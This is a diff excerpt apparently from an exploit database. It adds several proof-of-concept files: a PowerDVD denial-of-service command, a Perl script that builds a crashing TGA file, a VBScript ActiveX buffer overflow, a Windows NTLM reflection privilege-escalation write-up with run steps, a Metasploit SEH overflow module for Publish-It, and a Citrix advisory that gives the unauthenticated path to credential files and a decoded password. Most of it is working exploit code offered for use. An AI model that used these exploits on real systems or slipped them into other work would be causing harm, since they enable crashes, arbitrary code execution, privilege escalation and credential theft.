+Write payload to web directory --
+https://exploithub.com/joomla-e-commerce-wd-plugin-sql-injection.html
+
+-- 
+http://volatile-minds.blogspot.com -- blog
+http://www.volatileminds.net -- website
+

platforms/windows/dos/36427.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/50953/info
+
+PowerDVD is prone to a denial-of-service vulnerability.
+
+Attackers may leverage this issue to crash the affected application, denying service to legitimate users.
+
+PowerDVD 11.0.0.2114 is vulnerable; other versions may also be affected. 
+
+udpsz -c "\r\n\r\n" -T SERVER 55793 -1 

platforms/windows/dos/36431.pl

@@ -0,0 +1,49 @@
+# Exploit Title         : FastStoneImage Viewer (Corrupted tga) IMAGESPECIFICATION.Width Crash POC
+# Product               : FastStoneImage Viewer
+# Date                  : 25.02.2015
+# Exploit Author        : ITDefensor Vulnerability Research Team http://itdefensor.ru/
+# Software Link         : http://www.faststone.org/FSViewerDownload.htm
+# Vulnerable version    : 5.3 (Latest at the moment) and probably previous versions
+# Vendor Homepage       : http://www.faststone.org/
+# Tested on             : FastStoneImage Viewer 5.3 installed on Windows 7 x64, Windows Server 2008
+# CVE                   : unknown at the moment
+#============================================================================================
+# Open created POC file (poc.tga) with FastStoneImage Viewer
+# Details
+#*** ERROR: Module load completed but symbols could not be loaded for image00000000`00400000
+#image00000000_00400000+0x9357:
+#00409357 893a            mov     dword ptr [edx],edi  ds:002b:00e00880=????????
+#0:000:x86> kb
+#ChildEBP RetAddr  Args to Child              
+#WARNING: Stack unwind information not available. Following frames may be wrong.
+#0018f688 004ff000 0018f6b4 00404619 0018f6ac image00000000_00400000+0x9357
+#0018f6ac 00425374 0018f6c0 0042537e 0018f6d8 image00000000_00400000+0xff000
+#0018f6d8 004255a2 0018f72c 0018f6f0 004256bb image00000000_00400000+0x25374
+#0018f72c 004257ee 0018f784 00425822 0018f758 image00000000_00400000+0x255a2
+#============================================================================================
+#!/usr/bin/perl -w
+
+	$tga_id = "tga poc example" ;
+	
+	$tga_header =		"\xf" .				#	IDLength
+						"\x00" .			#	ColorMapType
+						"\xa" ;				#	ImageType
+						
+	$tga_cms_spec =		"\x00\x00" .		#	FirstIndexEntry
+						"\x00\x00" .		#	ColorMapLength
+						"\x00" ;			#	ColorMapEntrySize
+	
+	$tga_image_spec =	"\x00\x00" .		#	XOrigin
+						"\x00\x00" .		#	YOrigin
+						"\x00\xa0" .		#	Width		<--- ! Incorrect field, leads to application crash
+						"\x80\x00" .		#	Height
+						"\x10" .			#	PixelDepth
+						"\x1" ;				#	ImageDescriptor
+						
+	$tga_file_header = $tga_header . $tga_cms_spec . $tga_image_spec . $tga_id ;				
+	$tga = $tga_file_header . "a" x 10000 ;
+	
+	open FILE, ">poc.tga"	or die("Can't open poc.tga\n") ;
+	binmode(FILE) ;
+	print FILE $tga ;
+	close FILE ;

platforms/windows/dos/36433.txt

@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/51011/info
+
+The Yahoo! CD Player ActiveX control ('YoPlyCd.dll') is prone to a remote stack-based buffer-overflow vulnerability because the application fails to properly bounds check user-supplied input.
+
+Attackers can exploit this issue to execute arbitrary code within the context of an application (typically Internet Explorer) that uses the ActiveX control. Failed exploit attempts will result in a denial-of-service condition. 
+
+<object classid='clsid:5622772D-6C27-11D3-95E5-006008D14F3B' id='test'></object>
+
+<script language='vbscript'>
+
+ buff = String(2097512, "A") '<- EAX changes according to the first parameter of
+                             '   "String" function (Number As Long)
+ test.open buff
+
+</script>

platforms/windows/local/36424.txt

@@ -0,0 +1,44 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=222
+
+Windows: Local WebDAV NTLM Reflection Elevation of Privilege
+Platform: Windows 8.1 Update, Windows 7
+Class: Elevation of Privilege
+
+Summary:
+A default installation of Windows 7/8 can be made to perform a NTLM reflection attack through WebDAV which allows a local user to elevate privileges to local system. 
+
+Description:
+
+NTLM reflection is a well known issue with Windows authentication. It’s typically abused in networked scenarios to reflect credentials from one machine to another. It used to be possible to reflect credentials back to the same machine but that was mitigated in MS08-068 by not honouring NTLM authentication sessions already in flight. However this did nothing to stop cross-protocol attacks. 
+
+The WebClient service for WebDAV (which is installed and enabled by default, although you’d need to start it using its service trigger) also does NTLM authentication if the server requests it. As Windows has no block on binding to TCP ports < 1024 from a normal user account then we can setup our own WebDAV server running as a normal user bound to localhost (so also no firewall issues). If we can convince another user, ideally local system to connect to the WebDAV server we can start an NTLM authentication session. This can then be replayed locally to the TCP/IP CIFS service endpoint to authenticate as that user. If this was a local system account then that gives you full local admin privs, you can read/write any file on the system through the admin shares. You could also bind to local named pipes such as the service manager and create a new privileged service. 
+
+I’d put money on there being many ways of getting local system to open an arbitrary file, but the easiest one to exploit is Windows Defender (at least on Windows 8.1). You can tell it to initiate a scan of a file which gets opened under the local system token. Of course this might be a bug in and of itself. No processing of the path is done, it seems to be passed directly to CreateFile. This will cause a webdav connection to start to localhost and then NTLM can be negotiated. 
+
+I don’t believe I’ve changed the settings on my VMs which would enable this attack. Certainly reading Group Policy settings it seems like localsystem shouldn’t authenticate with the machine account by default, but it seems that you can. I’ve checked my security settings and they look correct. I’ve tested it on Windows 8.1 Update with defender, and on Windows 7 manually executing the open as local system and they both work. 
+
+After a quick search I can’t find anyone documenting this for the purposes of local privilege escalation attacks although it’s perhaps an obvious way of abusing the functionality so I would expect this is not common knowledge. It is the sort of bug which could be being exploited in the wild considering all it needs is socket access (which is any user) and some way of convincing a privileged user to open the local webdav share. Of course no-doubt it can be effectively mitigated using SMB signing although it isn’t clear that the NTLM extended protection is doing anything to stop it. That said this works in a default installation even with file sharing effectively disabled (at least as far as the GUIs will allow). 
+
+Even with signing enabled on the client I guess it’s possible that you can reflect the NTLM credentials to a local TCP DCE/RPC endpoint instead to achieve a similar effect. Also I wouldn’t be so sure that WebDAV is the only way of doing this. Again another one might be COM marshaling and specifying a endpoint locally (although it might be clever enough to not directly communicate for that one). Another use for this attack is for negotiating a local impersonation token for local system which could be used for Token Kidnapping purposes. Calling AcceptSecurityContext from any account with permissions to handle enterprise auth will be handed back an impersonation level token, even normal users. But of course network service etc would have most use for the token. 
+
+Proof of Concept:
+
+I’ve provided a PoC which causes the Windows Defender service to open a WebDAV connection as Local System. This is for Windows 8.1 only as Windows 7’s defender doesn’t support the command as far as I know. The credentials are reflected to the local SMB service to write the file dummy.txt to the root of the C: drive. Of course more dangerous things could be done at this point. The PoC is written in Java just because it was the easiest to modify it’s library. No doubt an existing relay application could be repurposed, for example SmbRelay3 is supposed to be able to relay HTTP to SMB auth, but I didn’t try that. 
+
+1) Install latest Java 8 JRE.
+2) Start the WebClient service, this could be done in many ways from a normal user, for now just start it using the service manager. 
+3) Extract the PoC to a directory.
+4) Run “java -jar SmbTest.jar” in the extracted directory. This binds the WebDAV server then starts a scan with defender, after some seconds the exploit should run (there’s some slowness in everything starting). 
+
+
+Repro Notes:
+If the PoC prints that the WebClient service isn’t started then start it. If no HTTP/NTLM traffic is printed to the console then webdav/mup had marked the server as down. Restart the webclient service and it should fix it. 
+
+Expected Result:
+It shouldn’t be possible to elevate privileges, the SMB connection should fail to authenticate
+
+Observed Result:
+Authentication was successful as local system and a file written to the root of the C drive .
+
+Proof of Concept:
+http://www.exploit-db.com/sploits/36424.zip

platforms/windows/local/36437.rb

@@ -0,0 +1,82 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'    => 'Publish-It PUI Buffer Overflow (SEH)',
+      'Description'  => %q{
+          This module exploits a stack based buffer overflow in Publish-It when
+          processing a specially crafted .PUI file. This vulnerability could be
+          exploited by a remote attacker to execute arbitrary code on the target
+          machine by enticing a user of Publish-It to open a malicious .PUI file.
+      },
+      'License'    => MSF_LICENSE,
+      'Author'    =>
+        [
+          'Daniel Kazimirow',  # Original discovery
+          'Andrew Smith "jakx_"',  # Exploit and MSF Module
+        ],
+      'References'  =>
+        [
+          [ 'OSVDB', '102911' ],
+          [ 'CVE', '2014-0980' ],
+          [ 'EDB', '31461' ]
+        ],
+      'DefaultOptions' =>
+        {
+          'ExitFunction' => 'process',
+        },
+      'Platform'  => 'win',
+      'Payload'  =>
+        {
+          'BadChars' => "\x00\x0b\x0a",
+          'DisableNops' => true,
+          'Space' => 377
+        },
+      'Targets'    =>
+        [
+          [ 'Publish-It 3.6d',
+            {
+              'Ret'     =>  0x0046e95a, #p/p/r | Publish.EXE
+              'Offset'  =>  1082
+            }
+          ],
+        ],
+      'Privileged'  => false,
+      'DisclosureDate'  => 'Feb 5 2014',
+      'DefaultTarget'  => 0))
+
+    register_options([OptString.new('FILENAME', [ true, 'The file name.', 'msf.pui']),], self.class)
+
+  end
+
+  def exploit
+
+    path = ::File.join(Msf::Config.data_directory, "exploits", "CVE-2014-0980.pui")
+    fd = File.open(path, "rb")
+    template_data = fd.read(fd.stat.size)
+    fd.close
+
+    buffer = template_data
+    buffer << make_nops(700)
+    buffer << payload.encoded
+    buffer << make_nops(target['Offset']-payload.encoded.length-700-5)
+    buffer << Rex::Arch::X86.jmp('$-399') #long negative jump -399
+    buffer << Rex::Arch::X86.jmp_short('$-24') #nseh negative jump
+    buffer << make_nops(2)
+    buffer << [target.ret].pack("V")
+
+    print_status("Creating '#{datastore['FILENAME']}' file ...")
+    file_create(buffer)
+
+  end
+end

platforms/xml/webapps/36441.txt

@@ -0,0 +1,38 @@
+Abstract
+
+
+It was discovered that Citrix Command Center stores configuration files containing credentials of managed devices within a folder accessible through the web server. Unauthenticated attackers can download any configuration file stored in this folder, decode passwords stored in these files, and gain privileged access to devices managed by Command Center.
+
+Tested version
+
+
+This issue was discovered in Citrix Command Center 5.1 build 33.3 (including patch CC_SP_5.2_40_1.exe), other versions may also be vulnerable.
+
+Fix
+
+
+Citrix reports that this vulnerability is fixed in Command Center 5.2 build 42.7, which can be downloaded from the following location (login required).
+https://www.citrix.com/downloads/command-center/product-software/command-center-52-427.html
+
+Citrix assigned BUG0493933 to this issue.
+
+Introduction
+
+
+Citrix Command Center is a management and monitoring solution for Citrix application networking products. Command Center enables network administrators and operations teams to manage, monitor, and troubleshoot the entire global application delivery infrastructure from a single, unified console.
+
+Citrix Command Center stores configuration files containing credentials of managed devices within a folder accessible through the web server. No access control is enforced on this folder, an unauthenticated attacker can download any configuration file stored in this folder.
+
+Details
+
+
+Configuration files can be downloaded from the conf web folder. Below is an example of a configuration file that can be obtained this way.
+
+https://<target>:8443/conf/securitydbData.xml
+
+This files contains encoded passwords, for example:
+
+<DATA ownername="NULL" password="C70A0eE9os9T2z" username="root"/>
+
+
+These passwords can be decoded trivially. The algorithm used can be found in the JAR file NmsServerClasses.jar. For example the encoded password C70A0eE9os9T2z decodes to SECURIFY123. The credentials stored in these files can than be used to gain privileged access to devices managed by Command Center.